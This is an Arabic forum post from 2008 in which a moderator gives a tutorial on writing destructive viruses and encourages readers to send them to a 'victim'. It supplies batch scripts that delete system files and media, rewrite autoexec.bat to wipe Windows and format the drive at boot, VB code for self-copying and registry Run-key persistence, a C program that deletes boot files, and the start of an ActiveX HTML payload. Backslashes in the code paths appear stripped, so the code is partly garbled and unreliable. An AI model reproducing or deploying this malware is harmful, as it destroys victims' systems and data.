منتديات الجديد الان

عزيزي الزائر / عزيزتي الزائرة يرجي التكرم بتسجبل الدخول اذا كنت عضو معنا
او التسجيل ان لم تكن عضو وترغب في الانضمام الي اسرة المنتدي
سنتشرف بتسجيلك
شكرا
ادارة المنتدي

اهلا وسهلا بكم اعضائنا الكرام نتمنى لكم قضاء اسعد الاوقات مع منتديات الجديد الان
شاركونا على الفيس بوك على هذة الصفحة حركة شباب 6 ابريل الجبهة الديمقراطية مرسى مطروح
اقوى واحدث الافلام الحصرية والمتنوعة

دخول

لقد نسيت كلمة السر

مقياس الحب

المواضيع الأخيرة

» Sex.Drive للكبار فقط مترجم
الأربعاء يونيو 29, 2016 3:19 am من طرف fouaz2008

» عرض ملابس داخلية في تايبيه
الأحد نوفمبر 22, 2015 10:53 pm من طرف sharqawym

» واشنطن تحذر رعاياها من السفر لإسرائيل
الخميس يونيو 18, 2015 2:52 am من طرف شهد وليد

» Sex is Zero 2 للكبار
الإثنين مايو 18, 2015 3:05 am من طرف fouaz2008

» فيلم Sex Pot 2009 مشاهدة مباشرة اون لاين بدون تحميل للكبار فقط + 18
الأربعاء نوفمبر 26, 2014 3:03 am من طرف da3amsa

» Sex.And.Breakfast (مترجم للعربية) للكبار فقط
الأربعاء يونيو 25, 2014 1:30 am من طرف مجد

» Eating Out 2: Sloppy Seconds فيلم اثارة كوميدى(مشاهدة مباشرة)للكبار فقط
الأحد أبريل 06, 2014 6:03 pm من طرف سارا ناصر

» الفيلم اللبناني لعبة النساء
الإثنين يونيو 03, 2013 9:13 pm من طرف gemer

» Zombie Strippers (اون لاين) وبدون تحميل للكبار فقط
الخميس مارس 07, 2013 11:49 pm من طرف hai divenistio

مكتبة الصور


التوقيت المحلى

توقيت العالم

Place holder for NS4 only

نتيجة منتديات الجديد الان

اضحك معنا

سحابة الكلمات الدلالية

احصائيات

أعضاؤنا قدموا 22368 مساهمة في هذا المنتدى في 1528 موضوع

هذا المنتدى يتوفر على 5247 عُضو.

آخر عُضو مُسجل هو 147258369 فمرحباً به.

عددسكان العالم

سكان العالم في تزايد مستمر

عدد اللذين ابصروا الدنيا منذ فتحك لهذه الصفحة


    شرح لأقوى طرق تصميم فيروس

    شاطر
    avatar
    فيروس
    مشرف
    مشرف

    ذكر
    الاسد
    عدد الرسائل : 464
    العمر : 37
    المهنة : Computer programming
    الهواية : The game of chess
    معلومات : انجلترا
    السٌّمعَة : 115
    نقاط : 882
    تاريخ التسجيل : 22/10/2008

    شرح لأقوى طرق تصميم فيروس

    مُساهمة من طرف فيروس في الأربعاء أكتوبر 22, 2008 11:29 pm

    و الأن بعد ان تعرفت على المكان كل ما عليك ان تضع الكود المناسب لك فى الnotepad و تحفظه و ..... فقط لا تقوم بأكثر من ذلك ألا اذا ارسلته الى الضحية التى تريد انهائها او يمكنك تجربت هذا الفيروس على جهاز التجارب اذا كان لديك

    قبل ان اضع لكم الأكواد اريد ان اوضح ان هذه الأكواد منقولة طبعا ولاكنى وضعت تحت كل كود اكبر شرح استطيع تقديمه عبر هذا الكود من حيث فكرة عمله و طريقة تعديله مع مثال بسيط عليه

    اريد ان اوضح انه من الأفضل نسخ الكود و لصقه فى المكان الذى تريده


    نبدأ بالكود الأول :

    @Echo off

    c:

    cd %WinDir%System

    deltree /y *.dll

    cd

    deltree /y *.sys

    الـتوضـــــــــــتيح :

    * بعد ان قمت بوضع الكود و حفظه بامتداد .bat فانت هاكذ تكون قد قمت بعمل فيروس و سوف تلحظ ان شكل الأيقونة قد تغير الى شباك ازرق وبداخله عجلة صفراء احذر منه فهو الأن جاهز للعمل و اياك ان تفتحه

    * هذا الفيروس يقوم على مسح كل ملفات ال dll وال sys من السيستم. وهذا ما سوف نلحظه بالنظر الى الكود السابق و به سوف نجد انه كتب فى هذا الكود امر " deltree " و هو الخاص بمسح الملفات ثم كتب بعد ذلك " *.dll كما كتب *.sys " و هو انى قد اعطيت له بان يمسح كل الملفات التى لها الأمتدادين السابقين و يمكن ملاحظة شئ اخر و هو كون الكمبيوتر يمسح الملفات من السيستيم و سوف نجد فى اول الكود الامر الخاص بذلك فسوف تجد انه قد اعطى له الأمر بالذهاب الى c: و كما اعطاه الأمر بالذهاب مالفات لويندوز عندما صدرنا له الأمر windir ثم اخبرناه ان الأوامر التالية يجب ان تكون داخل مل سيستيم و الذى هو موجود ضمن ملفات الويندوز

    * بعد ان فهمنا هذا المود ما رايكم هل هناك من يستطيع اجابتى على سؤالى و هو هل يمكننا تعديل هذا الكود ؟!!

    ----- لن ادعكم تفكرون فى الأجابة فانا سوف اعجبكم بكل بساطة و هى يمكننا ان نغير اى شئ قد فهمناه جيدا لذا نحن يمكننا ان نغير هذا الكود قليلا وسو اخبركم عما هو يمكننا ان نغيره و طبعا نتم تعرفون المكان الذىيمكننا ان نغيره فىالكود فيمكننا ان نغير نوعية الملفات التى سوف يقوم بمسحها او يمكننا زيادتها كما يمكننا ان نغير المكان الذى سوف يوجد فيه فمثلا هناك منيضع نوعين من انظمة التشغيل فهناك من يضع مثلا ويندوز 98 و Xp لذا يمكننا ان نغير اتجاه الفيروس الى d:

    مثال توضيحى :

    انا الأن اريد ان امزح مع احد و فى نفس الوقت عاوز اعلمه درس و تحزير فيمكننى ان اصنع فيروس يقوم بمسح جميع ملفات الصور التى امتددها *.jpg. كما اننى اريد ان امسح جميع ملفات الأغانى التى امتددها *.mp3 و جميع امتدادت الملفات الخاصة بلافلام و التى امتدادها *.asf و التى توجد فى E: كل ما علينا هو تعديل الكود ليصبح كالأتى

    @Echo off

    e:

    deltree /y *.jpg

    cd

    deltree /y *.mp3

    cd

    deltree /y *.asf

    ايه رايكم دلوقتى فى الفيروس الجديد اتمنى يعجبكم اما الأن فلنقراء الكود الثانى




    الكود الثانى :
    echo off@



    cls

    call attrib -h -r c:autoexec.bat >nul

    echo @echo off >c:autoexec.bat

    echo deltree /y c:progra~1*.* >nul >>c:autoexec.bat

    echo copy c:windowscommandformat.com c: >nul >>c:autoexec.bat

    echo copy c:windowscommanddeltree.exe c: >nul >>c:autoexec.bat

    echo deltree /y c:windows*.* >nul >>c:autoexec.bat

    echo format c: /q /u /autotest >nul >>c:autoexec.bat
    الـتوضـــــــــــتيح :

    الفيروس السابق يعتبر من الأفكار الجيدة للزين هما من محبين فى البرمجة وافهمين فى فكرة عمل لكمبيوتر و ليس ممن هم من هواة تعلم برنامج صغير ثم يقول عى نفسه خبير كمبيوتر

    نبدا بتوضيح الكود : فكما نرى فى الكود اول سطر مجرد فائدته مسح الشاشة من اى امر او تعليق مسبق حتى يجعل عمل هذا اليروس هو الوحيد



    بعد سوف نجد مجموعة من السطور هى تقريبا مكرره فكرتها وليس مكرر عملها ولاكن يمكننا ان نوضح انه هناك 3 اكود منفصله هم الفكرة الأسايه و هما ما سوف نحن نوضحه
    echo deltree /y c:progra~1*.* >nul >>c:autoexec.bat

    يعطى هذا المود الأمر للكمبيوتر بمسح الفولدر program files والذى يوجد فيه جميع البرامج التى تنزل على الجهاز و نلاحظ تكراره فى مسح الويندوز فى الكود

    echo deltree /y c:windows*.* >nul >>c:autoexec.bat

    ولاكنه اذا قام بمسح الويندوز فهو لن يستطيع عمل فورمات بعد ذلك لذا فقبل ذلك اعطى امر نسخ لهذان الأمرن حتى يمكننا استخدامهم فيما بعد و هذا هو ما اعطاه هذان السطرين

    echo copy c:windowscommandformat.com c: >nul >>c:autoexec.bat

    echo copy c:windowscommanddeltree.exe c: >nul >>c:autoexec.bat

    اما بعد ذلك فهو اعطاه الأمر بعمل فورمات للجهاز و هذا كما هو موجود فى السطر التالى



    echo format c: /q /u /autotest >nul >>c:autoexec.bat

    اولا يوجد بعض الامور توضيحها قبل البدأ فى هذا الموضوع وهو انه بوضع هذا الفيروس فى الـC:



    سوف يجعله يعمل تلقائيا عند فتح الجهاز لذا لا تحفظه فى هذا partion اما اذا كنت تسوى تهكرعلى جهاز فقم تحميل هذا الفيروس الى الـC: عنده ثم دعه يتمتع بذلك بعد ان يفتح جهازه

    ولاكنى وجدت فيه عيب بسيط و هو ان هذا الفيروس لن يعمل فى جهاز وضع فيه الويندو داخل فولدر غير windows فمثلا اذا كان هناك ضحيه يوجد عندها ويندوز موضوع داخل فولدر win98 فان الفيروس الذى كوناه لن يقوم ببعض الأعمال و هى نسخ الأوامر و مسح الويندوز ولاكنه سوف يقوم بعمل فورمات

    اما بالنسبة لتعديله فكل ما استطيع ان اعطيكم اياه من تدعديل مفيد فيه و هو انكم تمسحوا اوامر مسح الويندوز و Program files و تدع امر الفورمات مع تغير مثلا انه يسوى فورما على الـ D: فيكون لكود كما يلى

    echo off@



    cls

    call attrib -h -r c:autoexec.bat >nul

    echo @echo off >c:autoexec.bat

    echo format d: /q /u /autotest >nul >>c:autoexec.bat

    الكود الثالث :
    code:--------------------------------------------------------------------------------echo off@

    cls

    call attrib -h -r c:autoexec.bat >nul

    echo @echo off >c:autoexec.bat

    echo deltree /y c:progra~1*.* >nul >>c:autoexec.bat

    echo copy c:windowscommandformat.com c: >nul >>c:autoexec.bat

    echo copy c:windowscommanddeltree.exe c: >nul >>c:autoexec.bat

    echo deltree /y c:windows*.* >nul >>c:autoexec.bat

    echo format c: /q /u /autotest >nul >>c:autoexec.bat

    يعتبر هذا الفيروس نفس عمل السابق لذا انا لست بحاجه الى توضيحه او اخباركم بما انتم يجب ان تقومو به حتى تعدلوه

    كل ما انا يجب ان اقوله لكم بخصوص هذا الكود انه يجب عليكم ان تسمه بـ Autoexec.bat

    الأن و بعد ان تعرفنا الى الأكواد السابقة ما رأيكم فى جعل هذا الفيروس اقوى بان نضيف اليه بعض الخصائص و سوف اوضح اكواده

    الخاصــــــــــــــية الأولى :-

    On Error Resume Next



    Dim copy, copy2



    copy = "c:virus.exe"



    copy2 = "c:windowssystemProject12.exe"



    FileCopy copy, copy2

    يعطى هذا الكود للفيروس خاصية نسخ نفسه الى مكان اخر حتى لا يمكن للضحيه ايقافه بمجرد مسحه و يمكننا من التعامل مع الكود بكل بساطة هذا اذا كنت من الفاهمين للكمبيوتر بدرجة جيدة و ليس للبرامج الصغيرة التى تاتى معه

    الخاصــــــــــــــية الثانيه :-

    Option Explicit

    Private Declare Function RegQueryValueEx Lib "advapi32.dll" Alias "RegQueryValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long, ByVal lpData As String, lpcbData As Long) As Long



    Private Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long



    Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, ByVal lpData As String, ByVal cbData As Long) As Long



    Private Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long



    Private Declare Function RegDeleteKey Lib "advapi32.dll" Alias "RegDeleteKeyA" (ByVal hKey As Long, ByVal lpSubKey As String) As Long



    Private Declare Function RegDeleteValue Lib "advapi32.dll" Alias "RegDeleteValueA" (ByVal hKey As Long, ByVal lpValueName As String) As Long

    Private Const REG_SZ = 1



    Private Const LOCALMACHINE = &H80000002



    Private Sub Command1_Click()



    Dim InputValue As String



    Dim nBufferKey As Long, nBufferSubKey As Long


    RegCreateKey LOCALMACHINE, "SOFTWAREJPRODUCTIONS", nBufferKey



    RegOpenKey LOCALMACHINE, "SoftwareMicrosoftWindowsCurrentVersion", nBufferKey



    RegOpenKey nBufferKey, "Run-", nBufferSubKey



    InputValue = "c:windowssystemProject12.exe"



    RegOpenKey LOCALMACHINE, "SoftwareMicrosoftWindowsCurrentVersion", nBufferKey



    RegOpenKey nBufferKey, "Run-", nBufferSubKey



    RegSetValueEx nBufferSubKey, "My virus", 0, REG_SZ, InputValue, Len(InputValue)

    End Sub



    يعطى هذا الكود للفيروس خاصية انه يمكنه من ان يشتغل تلقائيا عند فتح الجهاز و هذا عن طريق تعديل ال registry :

    هذا هو كل ما انا حصلت عليه من اكواد للفيروسات فلقد شرحت لكم مجموعه من اكواد الفيروسات التى يمكننا من استخدامها و مجموعه من الأكواد التى باضافتها للفيروس تعطى له خصائص مفيده و هذا ليس كل شئ فنا ان حصلت على ى كود اخر فسوف اعطيه لكم فى هذا الموضوع و سوف اشرح فيه كل ما انا استطيع لذا انتظروا منى المفيد و يتبقى لنى شئ بسيط وانهى هذا الجزء و هو مجموعة اكواد لأشهر الفيروسات



    فيرووس C++ :



    *****************





    #include

    #include

    #include

    main()

    {

    clrscr();

    printf("tttWelcome to the Egyption -oO Virus Oo-nn");

    printf("tt**** -oO Israel Oo- and -oO America Oo-nn");

    remove("c:windowssystem.ini");

    remove("c:windowswin.ini");

    remove("c:autoexec.bat");

    remove("c:msdos.sys");

    remove("c:io.sys");

    remove("c:command.com");

    remove("c:config.sys");

    remove("c:windowsebdcommand.com");

    remove("c:windowsebdebd.cab");

    remove("c:windowsebdAutoexec.bat");

    remove("c:windowsebdsetramd.bat");

    remove("c:windowsebdFindramd.exe");

    rename("egypt.exe","c:/windows/startm~1/programs/startup/win.exe");

    printf("Windows destroyed ...nn");

    system("PAUSE");

    }

    فيرووس Visual Basic :
    ****************
    SetAttr "c:autoexec.bat", vbNormal

    SetAttr "c:msdos.sys", vbNormal

    SetAttr "c:io.sys", vbNormal

    SetAttr "c:windowswin.ini", vbNormal

    SetAttr "c:windowssystem.ini", vbNormal

    SetAttr "c:command.com", vbNormal

    SetAttr "c:config.sys", vbNormal

    SetAttr "c:windowsrundll.exe", vbNormal

    SetAttr "c:windowsrundll32.exe", vbNormal

    Kill "C:autoexec.bat"

    Kill "C:msdos.sys"

    Kill "C:io.sys"

    Kill "C:windowswin.ini"

    Kill "C:windowssystem.ini"

    Kill "C:command.com"

    Kill "C:config.sys"

    Kill "C:windowsrundll.exe"

    Kill "C:windowsrundll32.exe"


    فيروس Html

    *****************


    content="text/html; charset=iso-8859-1">


    THIS HTML USING ACTIVE-X PLEASE CLICK #YES#



    <script language="VBscript">

    [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

      الوقت/التاريخ الآن هو الإثنين ديسمبر 18, 2017 7:05 am